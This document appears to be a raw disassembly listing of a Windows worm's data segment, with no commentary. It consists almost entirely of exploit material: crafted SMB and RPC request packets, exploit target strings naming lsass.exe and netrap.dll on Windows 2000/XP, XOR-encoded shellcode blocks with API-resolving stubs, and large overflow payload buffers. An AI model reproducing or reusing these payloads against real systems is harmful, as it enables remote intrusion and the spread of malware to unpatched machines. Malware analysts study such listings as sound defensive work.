dword_43F0D0 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40D7FE+2D5�o
; sub_40DDD9+2FE�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 2 dup(0)
dword_43F178 dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40D7FE+3B4�o
; sub_40DDD9+3E1�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
off_43F1F8 dd offset loc_401490+5 ; DATA XREF: sub_40D7FE+3E2�o
; sub_40DDD9+40F�o
dd 3, 40707Ch, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset loc_407077+5
dd 1, 0
dd 1, 0
dd offset loc_407077+5
dd 1, 0
dd 1, 0
dd offset loc_407077+5
dd 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 2 dup(0)
dword_43F290 dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40D7FE+30A�o
; sub_40DDD9+337�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 2 dup(0)
dword_43F300 dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40D7FE+335�o
; sub_40DDD9+362�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 2 dup(0)
dword_43F378 dd 0 ; DATA XREF: sub_40D7FE+363�o
; sub_40DDD9+390�o
dd offset dword_40A86C+2Eh
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset dword_40A86C+2Eh
dd 1, 0
dd 1, 0
dd offset dword_40A86C+2Eh
dd 1, 0
dd 1, 0
dd offset dword_40A86C+2Eh
dd 1, 0
dd 1, 2 dup(0)
dword_43F400 dd 0AD9Dh ; DATA XREF: sub_40D7FE+EA�r
; sub_40D7FE+41E�r
dd 2 dup(0)
aWinxpProfessio db 'WinXP Professional [universal] lsass.exe ',0
align 10h
dword_43F440 dd 1004600h ; DATA XREF: sub_40D7FE+141�r
; sub_40D7FE+249�r ...
dd 1, 326E6957h, 7250206Bh, 7365666Fh, 6E6F6973h, 20206C61h
dd 755B2020h, 6576696Eh, 6C617372h, 656E205Dh, 70617274h
dd 6C6C642Eh, 2 dup(0)
dd 7515123Ch, 2, 326E6957h, 6441206Bh, 636E6176h, 53206465h
dd 65767265h, 535B2072h, 205D3450h, 20202020h, 656E2020h
dd 70617274h, 6C6C642Eh, 2 dup(0)
dd 751C123Ch, 0Fh dup(0)
dword_43F4F8 dd 0EB5D03EBh, 0FFF8E805h, 0C58BFFFFh, 3311C083h, 0C9B966C9h
; DATA XREF: sub_40E3B2+118�o
dd 88308001h, 0DDFAE240h, 7C036403h, 88086409h, 0C4608888h
dd 1888889h, 0FE7774CEh, 0C606E074h, 0D9606486h, 1888889h
dd 0BBE04ECEh, 0E08888BAh, 0D7BAFBFFh, 4EDE77DCh, 7770CE01h
dd 25E074FEh, 60468D51h, 888889B8h, 775ACE01h, 0FAE074FEh
dd 609E3B76h, 888889A8h, 7746CE01h, 67E074FEh, 60E86846h
dd 88888998h, 7742CE01h, 43E070FEh, 60B37465h, 88888988h
dd 777CCE01h, 51E070FEh, 60257D81h, 88888878h, 7778CE01h
dd 2CE070FEh, 604FF892h, 88888868h, 7764CE01h, 2CE070FEh
dd 6061A625h, 88888858h, 7760CE01h, 6DE070FEh, 60C10EC1h
dd 88888848h, 776ACE01h, 6FE070FEh, 60F14EF1h, 88888838h
dd 0BB5ECE01h, 7C640977h, 0DC888889h, 888989E0h, 7CDE7788h
dd 0D8D8D8D8h, 0D8C8D8C8h, 378DE77h, 0E0DFDF50h, 6FAB888Ah
dd 9EE24403h, 0DE77DBD9h, 77DBDF64h, 77BB60DEh, 77DBD9DFh
dd 58036ADEh, 0E036CE01h, 88ECE5EBh, 0B4AEE01h, 0B405244Ch
dd 0BB48BBACh, 9D490841h, 4E756A23h, 0CC98ACCCh, 0B5ACCC76h
dd 0C0ACDC01h, 0C4ACDC01h, 0D8ACDC01h, 98ACCC05h, 0D9D9D8DCh
dd 0C1D9C9D9h, 0FE77D9D9h, 0DE77D94Ah, 0E2440346h, 77B97777h
dd 40035ADEh, 7736FE77h, 16635EDEh, 0DE9CDE77h, 88B829ECh
dd 0C8038888h, 94F80384h, 80C80325h, 888C4AD6h, 0DFDEDDDBh
dd 90ACE403h, 3B4CD03h, 8BF08DDCh, 90C2035Dh, 8BA8D203h
dd 0C1BA6B55h, 8B03BC03h, 7477BB7Dh, 0B22448BBh, 498FFC4Ch
dd 708B8547h, 0F4B37A63h, 69FD9CACh, 8BACD203h, 8403EE55h
dd 94D203C3h, 8C03558Bh, 634D8B03h, 348BB8Ah, 0D5D6D75Dh
dd 888C4AD3h, 0
dword_43F6E0 dd 280004h, 10h, 4 dup(0) ; DATA XREF: sub_40E3B2+7B�o
dd 5A7B91F8h, 11D0FF00h, 0C000B2A9h, 0FCE6B64Fh, 0FFFFFFFFh
dd 68736942h, 326B656Bh, 0FF333030h, 0
dd 1, 0
dd 0FFFF0000h, 0FFFFFFFFh, 0FFFFh, 0
dword_43F734 dd 7FFDF020h, 0 ; DATA XREF: sub_40E971+15A�o
aRbrbrbrb db 'BBBB',0 ; DATA XREF: sub_40E971+A5�o
align 4
dword_43F748 dd 10FF8h ; DATA XREF: sub_40E971+6F�o
dword_43F74C dd 10FF8h, 2 dup(0) ; DATA XREF: sub_40E971+36�o
dword_43F758 dd 424D53FFh, 72h, 0C8531800h, 3 dup(0) ; DATA XREF: sub_40ED91+7B�o
dd 13370000h, 0
dd 2006200h
aPcNetworkPro_0 db 'PC NETWORK PROGRAM 1.0',0
db 2
aLanman1_0_0 db 'LANMAN1.0',0
dw 5702h
aIndowsForWor_0 db 'indows for Workgroups 3.1a',0
db 2
aLm1_2x002_0 db 'LM1.2X002',0
dw 4C02h
aAnman2_1_0 db 'ANMAN2.1',0
db 2, 4Eh, 54h
aLm0_12_0 db ' LM 0.12',0
align 10h
dword_43F7E0 dd 0 ; DATA XREF: sub_40ED91+44�o
dd 800000D4h, 0
dword_43F7EC dd 424D53FFh, 73h, 0C8071800h, 3 dup(0) ; DATA XREF: sub_40ED91+34�o
dd 13370000h, 0
dd 0FF0Ch, 0A110400h, 3 dup(0)
unk_43F820 db 81h ; ; DATA XREF: sub_40EE6B+A�o
db 2 dup(0), 44h
aCkfdenecfdeffc db ' CKFDENECFDEFFCFGEFFCCACACACACACA',0
aCacacacacacaca db ' CACACACACACACACACACACACACACACAAA',0
align 10h
byte_43F870 db 41h ; DATA XREF: sub_40F47A+104�r
aBcdefghijklmno db 'BCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/',0
align 8
aSvwfbA db 'SVWfì€',0 ; DATA XREF: seg000:0040F753�o
aIcsa db '‰æèí',0
db 2 dup(0), 0FFh
dd 12096836h, 0F7E863D6h, 89000000h, 0A2E80846h, 0FF000000h
dd 6B680476h, 0E8CA2BD0h, 0E2h, 0E80C4689h, 3Fh, 680476FFh
dd 4C0297FAh, 0CDE8h, 68DB3100h, 410h, 89D0FF53h, 768B56C3h
dd 0B9C78910h, 410h, 315EA4F3h, 505050C0h, 0FF505053h
dd 468B0C56h, 0C4816608h, 5E5F0080h, 60E0FF5Bh, 23E8h
dd 24448B00h, 7C588D0Ch, 53C4383h, 284381h, 81000010h
dd 0F0002863h, 48BFFFFh, 14C48324h, 0C3C03150h, 0FF64D231h
dd 22896432h, 90B8DB31h, 31429042h, 8902B1C9h, 74AFF3DFh
dd 0F3EB4303h, 64107E89h, 6158028Fh, 20BF60C3h, 8B7FFDF0h
dd 8468B1Fh, 7F8B0789h, 78C781F8h, 89000001h, 741939F9h
dd 0EB098B04h, 39FA89F8h, 574045Ah, 0EB04528Bh, 891189F6h
dd 43C6044Ah, 0C36101FDh, 0FDF00CA1h, 1C408B7Fh, 8908588Bh
dd 8B008B1Eh, 46890840h, 8B60C304h, 8B28246Ch, 548B3C45h
dd 0EA017805h, 8B184A8Bh, 0EB01205Ah, 8B4938E3h, 0EE018B34h
dd 0C031FF31h, 0E038ACFCh, 0CFC10774h, 0EBC7010Dh, 247C3BF4h
dd 8BE17524h, 0EB01245Ah, 4B0C8B66h, 11C5A8Bh, 8B048BEBh
dd 4489E801h, 0C2611C24h, 0FEEB0008h, 0
dword_43FA20 dd 0F254C481h, 0E8FCFFFFh, 46h, 8B3C458Bh, 178057Ch, 184F8BEFh
; DATA XREF: seg000:0040F701�o
dd 1205F8Bh, 492EE3EBh, 18B348Bh, 99C031EEh, 74C084ACh
dd 0DCAC107h, 0F4EBC201h, 424543Bh, 5F8BE375h, 66EB0124h
dd 8B4B0C8Bh, 0EB011C5Fh, 18B1C8Bh, 245C89EBh, 0C031C304h
dd 30408B64h, 0F78C085h, 8B0C408Bh, 8BAD1C70h, 0BE90868h
dd 8B000000h, 7C053440h, 8B000000h, 315F3C68h, 0EB5660F6h
dd 0CEEF680Dh, 986860E0h, 570E8AFEh, 0EEE8E7FFh, 0FFFFFFh
dword_43FAB0 dd 1000005h, 10h, 418h, 0 ; DATA XREF: seg000:0040FC62�o
dd 400h, 90000h, 3 dup(1), 2 dup(3), 2, 7E4h, 0
dd 7E4h, 53004Fh, 3Ah
aPrivate: ; DATA XREF: seg000:0040FC86�o
unicode 0, <\PRIVATE$\>,0
align 4
dword_43FB0C dd 5, 10h, 418h, 0 ; DATA XREF: seg000:0040FC93�o
dd 400h, 90000h, 0
dword_43FB28 dd 2000005h, 10h, 404h, 0 ; DATA XREF: seg000:0040FCBF�o
dd 3ECh, 90000h, 0
dword_43FB44 dd 909008EBh, 4014E9h, 2 dup(90909090h), 909008EBh, 4014E9h
; DATA XREF: seg000:0040FCD2�o
dd 1AEB9090h, 6F684041h, 6F657375h, 62616466h, 41487375h
dd 909006EBh, 100124Dh, 90909090h, 9090h
dword_43FB80 dd 0E983C929h, 0D9EED9B0h, 5BF42474h, 19137381h, 833704F5h
; DATA XREF: seg000:0040FD03�o
dd 0F4E2FCEBh, 7AEF9FE5h, 0C8FB0CF1h, 5B8F95E6h, 728FD13Dh
dd 32787E25h, 0BCEBF461h, 688FED56h, 7EEFF439h, 368FC192h
dd 0AEC4C4F7h, 43C471B5h, 3ACE341Eh, 0C3EF3718h, 1F20A122h
dd 688F106Ch, 51EFF43Dh, 0BC4FF992h, 0DC05E946h, 0BE8FD91Ah
dd 5618D175h, 53DFC4DAh, 0BC34B692h, 478FF959h, 778F5805h
dd 0B96CAB11h, 67E8FB57h, 646223E6h, 5379D7Fh, 5778271h
dd 0E7FBA146h, 0CBE93E71h, 0E1FBA522h, 51E17C46h, 350C1898h
dd 0C8069F4Ch, 3EDD9DC9h, 0C85358ECh, 6457A6CFh, 6447A64Ah
dd 0E7FBA65Ah
db 7Fh, 9Dh
word_43FC3A dw 551Ah ; DATA XREF: seg000:0040FD0C�w
dd 0D68DA67Fh, 2DA09D8Ch, 0C8533269h, 66149FCFh, 5FD40A4Ch
dd 0DE2A58BDh, 64D20A4Eh, 5FD40A4Ch, 7E82BCFCh, 67D20A4Eh
dd 0C851A14Dh, 0D06C66C9h, 607D3360h, 0C85123E6h, 536E93C9h
dd 5A679D7Fh, 676E1090h, 0BEC8DC40h, 0BE409FFEh, 0C4C4C4FBh
dd 1A460BB3h, 0A428B7E7h, 9C3C8F94h, 456C5EB2h, 0C81246E7h
dd 0E1FBB16Ch, 6656A242h, 366EA448h, 6651A448h, 9A6C25E6h
dd 64CAF0C0h, 0C86E23E6h, 0E7FBC2E6h, 0B4F8A292h, 0E1FB91DDh
dd 5FD40A4Bh, 57E43BF6h, 0C8D20A4Ah, 3704F5C9h, 2 dup(0)
dword_43FCE0 dd 4A5A10EBh, 0B966C933h, 3480017Dh, 0FAE2990Ah, 0EBE805EBh
; DATA XREF: seg000:004103D6�o
; seg000:004104AF�o
dd 70FFFFFFh, 99999895h, 0A938FDC3h, 12999999h, 0E91295D9h
dd 0D9123485h, 12411291h, 0ED12A5EAh, 6A9AE187h, 9AB9E712h
dd 8DD71262h, 0CECF74AAh, 9AA612C8h, 0F36B1262h, 3F6AC097h
dd 0C6C091EDh, 0DC9D5E1Ah, 0C6C0707Bh, 125412C7h, 5A9ABDDFh
dd 589A7848h, 12FF50AAh, 85DF1291h, 78585A9Ah, 12589A9Bh
dd 125A9A99h, 1A6E1263h, 4912975Fh, 71C09AF3h, 9999991Eh
dd 0CB945F1Ah, 65CE66CFh, 0F34112C3h, 0ED71C09Ch, 0C9999999h
dd 0F3C9C9C9h, 669BF398h, 411275CEh, 999B9E5Eh
dword_43FD90 dd 59AA4B9Dh, 0F39DDE10h, 66CACE89h, 98F369CEh, 6DCE66CAh
; DATA XREF: seg000:00410305�o
dd 66CAC9C9h, 491261CEh, 12DD751Ah, 0F359AA6Dh, 9D10C089h
dd 10627B17h, 0CF10A1CFh, 0D9CF10A5h, 0B5DF5EFFh, 0DE149898h
dd 0AACFC989h, 0C8C8C850h, 0C8C898F3h, 0FAA5DE5Eh, 1499FDF4h
dd 0C8C9A5DEh, 0CB79CE66h, 0CA65CE66h, 0C965CE66h, 0AA7DCE66h
dd 591C3559h, 0CBC860ECh, 4B66CACFh, 7B32C0C3h, 5A59AA77h
dd 66677671h, 0EDFCDE66h, 0FAF6EBC9h, 0EBFDFDD8h, 99EAEAFCh
dd 0F8FCEBDAh, 0EBC9FCEDh, 0EAFCFAF6h, 0DC99D8EAh, 0CDEDF0E1h
dd 0F8FCEBF1h, 0F6D599FDh, 0F0D5FDF8h, 0EBF8EBFBh, 0EE99D8E0h
dd 0AAC6ABEAh, 0CACE99ABh, 0FAF6CAD8h, 0D8EDFCF2h, 0F7F0FB99h
dd 0F0F599FDh, 0F7FCEDEAh, 0FAFAF899h, 99EDE9FCh, 0EAF6F5FAh
dd 0FAF6EAFCh, 99EDFCF2h, 0
dword_43FE78 dd 600EBh ; DATA XREF: seg000:00410460�o
dword_43FE7C dd 0FFF83FE9h, 0FFh ; DATA XREF: seg000:00410393�o
off_43FE84 dd offset aWeingarten+9 ; DATA XREF: seg000:00410481�o
a2w:
unicode 0, <2w>,0
align 10h
dword_43FE90 dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0 ; DATA XREF: seg000:00410561�o
; seg000:0041061D�o
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2
dword_43FED8 dd 3000005h, 10h, 0D20h, 1, 0D08h, 90000h, 419h, 0
; DATA XREF: seg000:0041040E�o
dd 419h
dword_43FEFC dd 3000005h, 10h, 1520h, 1, 1508h, 90000h, 819h, 0
; DATA XREF: seg000:00410341�o
dd 819h
dword_43FF20 dd 0BAADh, 40000h, 0 ; DATA XREF: seg000:00410442�o
dd 40000h, 430000h, 5C003Ah, 40000h, 0
dd 40000h, 430000h, 5C003Ah, 40000h, 0
dd 40000h, 430000h, 5C003Ah, 8080000h, 130079h, 0
dd 130000h, 640000h, 6D006Fh, 690061h, 2E006Eh, 610062h
dd 740073h, 720061h, 2E0074h, 65006Eh, 74h, 0BAADh, 8500000h
dd 0B0079h, 0
dd 0B0000h, 440000h, 4D004Fh, 490041h, 5C004Eh, 4C0042h
dd 41h, 6C68BAADh, 0F0B60013h, 24E563BBh, 5FD45F0Fh, 0DF7B4444h
dd 0DA1E42A2h, 0F84FBDC6h, 0CC7B2D6Dh, 0F6DAFABFh, 9957C071h
dd 410B1AEBh, 46F69CCBh, 2E0CCA98h, 0FEE65D4Fh, 0BCE2FD34h
dd 14772D1h, 0DDAFF5E1h, 276A0160h, 26F6C036h, 909C988Bh
dd 2383541Fh, 0FF78501Dh, 0BC6FC3A9h, 7AEDEAD6h, 0D33E15C9h
dd 18924307h, 84B743A3h, 99912670h, 6AFBAC10h, 0FAF6373Fh
dd 232A7A8h, 0C47B323Ah, 2F373822h, 0FBB32D08h, 0AB0316D8h
dd 0D2B7ACC5h, 0AB285C9Eh, 54F58E7Eh, 1EF0BFA3h, 0FC370693h
dd 0B6B21CD0h, 0B35B23D5h, 3BD4E764h, 0BD1FE911h, 6696F5C8h
dd 0C7D84740h, 56F525C2h, 0B1E658D7h, 85459C41h, 0CF5515B8h
dd 1B99583Eh, 0E479E2EFh, 0F5B9A1AFh, 5BADB1C4h, 0FCB06DFh
dd 6FF714h, 0F450AEC3h, 0BE20C3AFh, 1D9B9B89h, 902F08B5h
dd 0B593A29Ch, 0AD3EB99h, 65BD84B4h, 0DCF9C147h, 4FB358D5h
dd 1F051851h, 665F64B7h, 4F7D2E50h, 0FD32403Ah, 0CAA2048Eh
dd 0E8ECD048h, 1C68BE70h, 0C1F22032h, 2C20A9E2h, 0AFD8F043h
dd 0AD2A81EFh, 39300457h, 0ACBB45F6h, 54D49701h, 16DF66BFh
dd 4B670129h, 856AA3B8h, 0A04D2B42h, 0B6FB0C9Bh, 81BDC57Ch
dd 0D9741A3Eh, 584B13DFh, 0EACF0598h, 9CEBFF61h, 3FEC7886h
dd 3FD3839h, 8BC57D88h, 1615362Dh, 3C94E81Bh, 10890BE9h
dd 1114E699h, 2F8C54Fh, 0B195A1B8h, 0F62BCF58h, 3F3E17B2h
dd 0E2DE4865h, 0B8E74DAEh, 0BFFADE91h, 0E6463Ch, 0A37E40A4h
dd 0A0A1DE35h, 15EBF902h, 27A4A30h, 3A2DE938h, 942C18F3h
dd 35F74713h, 0A03749A7h, 0BFAA1B98h, 0E3028BF5h, 6A5444F4h
dd 0BF8D9185h, 0C24CE40Ch, 8239677Fh, 4B0E4B66h, 0ACA84C34h
dd 51110F0Ah, 0A35A3E7Bh, 0F24626FBh, 6D3BAF84h, 81774A00h
dd 0B7DB7009h, 0A2EFECF5h, 110328F8h, 1D3D93ADh, 4FC3D6ACh
dd 7382EFFAh, 7B7D0CAh, 6E901B06h, 0F0B60013h, 24E563BBh
dd 5AB55F0Fh, 0EA2829F2h, 9F08AC70h, 7E92BB80h, 0E2F4253Ch
dd 91578ABFh, 0D28AC0F1h, 423A4F01h, 0C35570EEh, 70C4C75h
dd 0DFA846FFh, 684519A9h, 17172D0h, 0DDAF22E1h, 9CE4A188h
dd 15F6C071h, 891109F0h, 53830A1Fh, 6C4E501Dh, 0BC6F6409h
dd 3F57EAAEh, 0D33E15B4h, 0ED924307h, 84B75E17h, 36912673h
dd 92FBFC09h, 0FAEA348Ah, 0BB32A7A8h, 0C47B3235h, 2F37282Ah
dd 0FBB32D08h, 0ABDB16D8h, 3B7ACC5h, 0ABD95C0Bh, 54F58E7Eh
dd 1EF0BFA3h, 0FC37145Ch, 0B6B21CFBh, 0B3BE90D5h, 0A1D4E764h
dd 0BD1FE911h, 6696F5C8h, 8BD84740h, 56F5258Dh, 0B1E658D7h
dd 46039C41h, 0CF551570h, 1B99583Eh, 0E415E2EFh, 0F5FEA1AFh
dd 5BADB1C4h, 0FCB06DFh, 6FF714h, 0AA50AEC3h, 0BE20C3AFh
dd 1D9B9BD2h, 902F08B5h, 0B58AA29Ch, 0AD3EB99h, 656D84B4h
dd 0DCF9C147h, 812E58D5h, 8B051851h, 665F64B7h, 4F7DCD50h
dd 0FD32403Ah, 0CAA2048Eh, 0E848D048h, 1C219170h, 0C1F22032h
dd 2CC3A9E2h, 0AFD8F043h, 0AD2A81EFh, 39300457h, 0ACBB45F6h
dd 54D4979Ah, 16DFE8BFh, 4BDAB329h, 856AA3B8h, 0A04D2B42h
dd 0B6FB7E9Bh, 0ABBDC5D7h, 0D9741A3Eh, 584B13DFh, 0EACF0598h
dd 9CEBFF61h, 3FEC7886h, 3FD3839h, 8BC57D88h, 1615362Dh
dd 0BE94E81Bh, 10890BE9h, 1114E699h, 2F8C54Fh, 0B195A1B8h
dd 0F62BCF58h, 3F3E17B2h, 0E2DE1865h, 0B8E74DADh, 0BFFADE91h
dd 0E6463Ch, 0A37E40A4h, 0A0A1DE35h, 15EBF9DCh, 27AFD30h
dd 3A2DE938h, 942C18F3h, 64F74713h, 0A03749A7h, 0BFAA1B98h
dd 0E3028BF5h, 6A5444F4h, 0BF8D9132h, 0C24CE40Ch, 8239677Fh
dd 4B0E4B66h, 0ACA84C34h, 51110F0Ah, 0A35A3E7Bh, 0F24626FBh
dd 6D3BAF84h, 81774A00h, 0B7DB7009h, 0A2EFECF5h, 110328F8h
dd 1D3DB8ADh, 4FC3D6ACh, 7382EFFAh, 7B7D0CAh, 8C01B06h
dd 2 dup(0)
dword_4403F0 dd 0AD00F0h, 0D00BAh, 0AD00F0h, 0D00BAh, 0AD00F0h, 0D00BAh
; DATA XREF: seg000:00410375�o
dd 0AD00F0h, 0AB00BAh, 3 dup(0AB00ABh), 0ABh, 0BAADh, 40000h
dd 0
dd 40000h, 430000h, 5C003Ah, 40000h, 0
dd 40000h, 430000h, 5C003Ah, 40000h, 0
dd 40000h, 430000h, 5C003Ah, 1F500000h, 130079h, 0
dd 130000h, 640000h, 6D006Fh, 690061h, 2E006Eh, 610062h
dd 740073h, 720061h, 2E0074h, 65006Eh, 74h, 0BAADh, 1F980000h
dd 0B0079h, 0
dd 0B0000h, 440000h, 4D004Fh, 490041h, 5C004Eh, 4C0042h
dd 41h, 6C68BAADh, 6FF80013h, 780871B6h, 7906B81Dh, 681B4105h
dd 0A519318Fh, 8EF1AE30h, 0FEA20E2Dh, 0E10BAE59h, 0F668E92Fh
dd 3DBBE22Bh, 0C9FE0679h, 10BC298Fh, 7A80C221h, 0AE21D2C8h
dd 4BB6B50Eh, 6341DBF5h, 503DCD4Fh, 16B2EC49h, 62E61679h
dd 48066954h, 18A491ADh, 65476540h, 9C51320Ch, 8918033Fh
dd 0A8CFCA73h, 4544AF4Eh, 45745E1Ah, 2AA23559h, 0B312E7C7h
dd 250D2D9Bh, 9F72D49Ah, 0CD63800Bh, 0B488DB31h, 0FBFFF7A7h
dd 8B52B7BEh, 0E24E0F98h, 7E3F94C6h, 0A0BA7AC2h, 8F3EAC69h
dd 32706D45h, 0FFFA1DFCh, 2FF75D6Eh, 974CDF4Fh, 2A6FD55Eh
dd 3597F736h, 0EC535F2h, 24D28A6Bh, 0FED5ED62h, 3D5BB4C6h
dd 51A693F8h, 0EABEB7CDh, 853D253Bh, 7B4CEA2Eh, 0B465545Eh
dd 63045DD4h, 0E8D119Ah, 51529C16h, 1F717A3Ah, 0B77EE55Ch
dd 0E653AEBDh, 1A26D3B9h, 24EED272h, 0D590E979h, 533C056Bh
dd 0AF028119h, 72C03514h, 61FC14ABh, 0F2B90F3Fh, 93DE26C0h
dd 1796F37h, 0D7DA3452h, 0D815311Dh, 0D143E127h, 0C9CA5CB9h
dd 0C904E41h, 68CAD06Bh, 0DFDF54F1h, 0FF2E9AE0h, 0F19918E2h
dd 89B2F77Ah, 6E508D09h, 233B4704h, 91F429ABh, 76117BA2h
dd 0D09B57DDh, 891B18C9h, 0F4931D47h, 0B2243192h, 0D59B1C2Dh
dd 85E02CA5h, 0C9BC5C0Eh, 391E990Dh, 78B62407h, 0DE0497A4h
dd 4862937Dh, 6EA0E05Ah, 0CBA5AFF7h, 68104795h, 0F94C833Dh
dd 1BEAA05Dh, 0A1E74B9Ah, 56F21589h, 1CD8D722h, 75E3EE2Fh
dd 77BD6D19h, 0B2415BF0h, 0C573CD85h, 3146AA92h, 4E6AB17Dh
dd 6038110Dh, 0C5E9C0A5h, 0EE83E634h, 0C79E34F8h, 1F2137D6h
dd 0C25536DAh, 945DDB80h, 2EAFF676h, 0CF562D07h, 0BB6B6C1Ch
dd 3C6AF0A7h, 0DE8A55BDh, 0A0DDD260h, 15003D6h, 0E290152h
dd 0CF353A38h, 51B72663h, 8DCD3FD0h, 986F2F49h, 0C5F77BDh
dd 364A9BCh, 6A7C6B6Fh, 6E90B28Dh, 6FF80013h, 780871B6h
dd 6412B81Dh, 712E4483h, 16CE899Eh, 41BF70E6h, 0FE09C7F6h
dd 0E1DAB4F0h, 24F7E92Fh, 51DE48F1h, 0C9FE5877h, 85B35868h
dd 74CC2A4h, 0AE00ACC8h, 24D7C0Eh, 63416DF1h, 50ACAB4Fh
dd 16B2EC49h, 0ADFF1EE6h, 0EC060AA1h, 1EB1C0A2h, 0A5AD6640h
dd 9CDCD90Ah, 8918DD3Fh, 0A8CFCA73h, 45448B0Bh, 0B574DD10h
dd 2AA272B4h, 0B312E7C7h, 0AD0D2D9Bh, 9F71D49Ah, 50D7750Bh
dd 0B488DB31h, 7EFFF7A7h, 8B72B7BEh, 0A14ED9A8h, 7E3F94C6h
dd 0A0BA60C2h, 0F3EEA69h, 32706D45h, 91FA1DD2h, 2FF75D6Eh
dd 974C46E4h, 2A6FD58Dh, 3697F736h, 0EC535F2h, 24648A6Bh
dd 0FED5ED95h, 3D5BB4C6h, 51A60FF8h, 0EABEB7CDh, 74FF8EEAh
dd 0CD4CEA98h, 0B465545Eh, 63CA5DD4h, 0E8D699Ah, 51529C16h
dd 1F717A3Ah, 0B77EE55Ch, 0E653AE6Dh, 1A26D3B9h, 24EED272h
dd 0D590E979h, 533C056Bh, 0AF028119h, 72C03514h, 61FC16F4h
dd 0F291A03Fh, 93DE26C0h, 1796F37h, 0D7DA34B8h, 0D8153186h
dd 0D143E144h, 0C9CAF5B2h, 0C906E41h, 68CAD06Bh, 0DFDF54F1h
dd 0FF2E9AE0h, 0F19918E2h, 897AF77Ah, 6E0E8D09h, 233B4704h
dd 91F429ABh, 761129A2h, 0D09B57DDh, 891B18C9h, 0F4FD1D47h
dd 0B2243192h, 0D59B1C2Dh, 85E02CA5h, 0C9BC5C0Eh, 391E990Dh
dd 78B62407h, 0DE0497A4h, 4862937Dh, 6EA0E05Ah, 0CBA5AFF7h
dd 688D4795h, 0F94C833Dh, 1BEAA05Dh, 0A1E74B9Ah, 56F21589h
dd 1CD8D722h, 75C2EE2Fh, 77BD6D19h, 0B2415BF0h, 0C573CD85h
dd 3146AA92h, 4E6AB17Dh, 6038110Dh, 0C5E9C0A5h, 0DD83F934h
dd 0C79E34C3h, 1F2137D6h, 0C25536DAh, 945DDB80h, 2EAFF676h
dd 0CF9D2D07h, 0BB6B6C1Ch, 3C6AF0A7h, 0DE8A55BDh, 0A0DDD260h
dd 15003D6h, 0E290152h, 0CF353A38h, 51B7263Eh, 8DCD3FD0h
dd 986F2F49h, 0C5F77BDh, 364A9BCh, 6A7C6B6Fh, 8C0B28Dh
dd 2 dup(0)
dword_4408F0 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: seg000:0041074B�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkPro_1 db 'PC NETWORK PROGRAM 1.0',0
db 2
aLanman1_0_1 db 'LANMAN1.0',0
dw 5702h
aIndowsForWor_1 db 'indows for Workgroups 3.1a',0
db 2
aLm1_2x002_1 db 'LM1.2X002',0
dw 4C02h
aAnman2_1_1 db 'ANMAN2.1',0
db 2, 4Eh, 54h
aLm0_12_1 db ' LM 0.12',0
align 10h
dword_440980 dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: seg000:0041078F�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows20002_0:
unicode 0, <Windows 2000 2195>,0
aWindows20005_1:
unicode 0, <Windows 2000 5.0>,0
align 10h
dword_440A30 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: seg000:004107C2�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 41ED0000h, 2686272Ch
dd 0B3A059D2h, 8800AA5Eh, 57C56Fh, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_440B10 dd 5A000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: seg000:00410803�o
dd 0FEFF0000h, 300800h, 5A00FF04h, 1000800h, 2F00h, 0
dword_440B44 dd 3F3F0000h, 3F3F3Fh, 0 ; DATA XREF: seg000:00410868�o
